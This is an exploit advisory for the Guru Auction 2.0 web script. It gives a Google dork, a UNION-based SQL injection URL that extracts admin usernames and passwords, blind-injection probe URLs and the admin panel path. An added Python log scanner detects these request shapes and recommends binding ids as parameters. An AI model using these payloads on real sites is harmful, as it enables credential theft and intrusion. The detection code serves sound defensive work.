Guru Auction 2.0 Multiple SQL Injection Vulnerabilities

Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false

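Both PoC sections above describe injection through integer id parameters on two scripts. As an added example, written for this page and not part of the advisory or the vendor's code, the following Python scans Apache-style access-log lines for the two request shapes the advisory documents: a UNION ... SELECT payload in subcat.php's cate_id, and boolean-blind probes (AND ... SUBSTRING(@@version ...)) in detail.php's item_id. The endpoint and parameter names come from the advisory; the log lines, client addresses and the /shop/ path prefix are constructed sample data.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (Apache combined format); not taken from any real server.
# Lines 2-4 reproduce the request shapes from the advisory, lines 1 and 5 are benign traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /shop/subcat.php?cate_id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- HTTP/1.1" 200 6210 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:03 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 HTTP/1.1" 200 3990 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:57:10 +0000] "GET /shop/detail.php?item_id=575 HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, identd, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Scripts and the integer id parameter each one takes, as named in the advisory.
NUMERIC_PARAMS = {"/subcat.php": "cate_id", "/detail.php": "item_id"}

UNION_RE = re.compile(r'\bunion\b.*\bselect\b', re.I)
BLIND_RE = re.compile(
    r'\b(and|or)\b.*(substring|substr|mid|ascii|sleep|benchmark|@@version|version\()', re.I
)


def classify_value(value):
    """Label a value that should have been a plain integer id; None means it looks legitimate."""
    if re.fullmatch(r'\s*-?\d+\s*', value):
        return None                       # an ordinary numeric id
    v = " ".join(value.split())           # collapse tabs/newlines sometimes used to evade filters
    if UNION_RE.search(v):
        return "union-based"
    if BLIND_RE.search(v):
        return "boolean-blind"
    return "non-numeric-id"               # not a known payload shape, but still not an integer


def scan_line(line):
    """Return a finding dict for one log line, or None if the line is benign or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parsed = urlparse(m.group("target"))
    param = next((p for path, p in NUMERIC_PARAMS.items() if parsed.path.endswith(path)), None)
    if param is None:
        return None                       # not one of the scripts we care about
    # parse_qs percent-decodes and turns '+' into spaces, so the regexes see the decoded payload.
    for value in parse_qs(parsed.query, keep_blank_values=True).get(param, []):
        label = classify_value(value)
        if label:
            return {"ip": m.group("ip"), "path": parsed.path, "param": param,
                    "kind": label, "status": m.group("status"), "size": m.group("size")}
    return None


def scan_log(text):
    """Scan a whole log; boolean-blind probes typically show up as runs of near-identical
    requests from one client whose response sizes alternate (compare sizes 4410 vs 3990 above)."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} {f['param']}: {f['kind']} (status {f['status']}, {f['size']} bytes)")
```

Run against a real log the same parser applies unchanged; only SAMPLE_LOG and the /shop/ prefix are constructed. The numeric-id check is the important part: for these two scripts any non-integer value is an anomaly, so the first line of defense is the same server-side rule (cast the id to an integer, or bind it as a parameter in a prepared statement) that would have prevented the injection in the first place.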
Admin login panel:
~~~~~~~~~~
http://domain.tld/[path]/admin/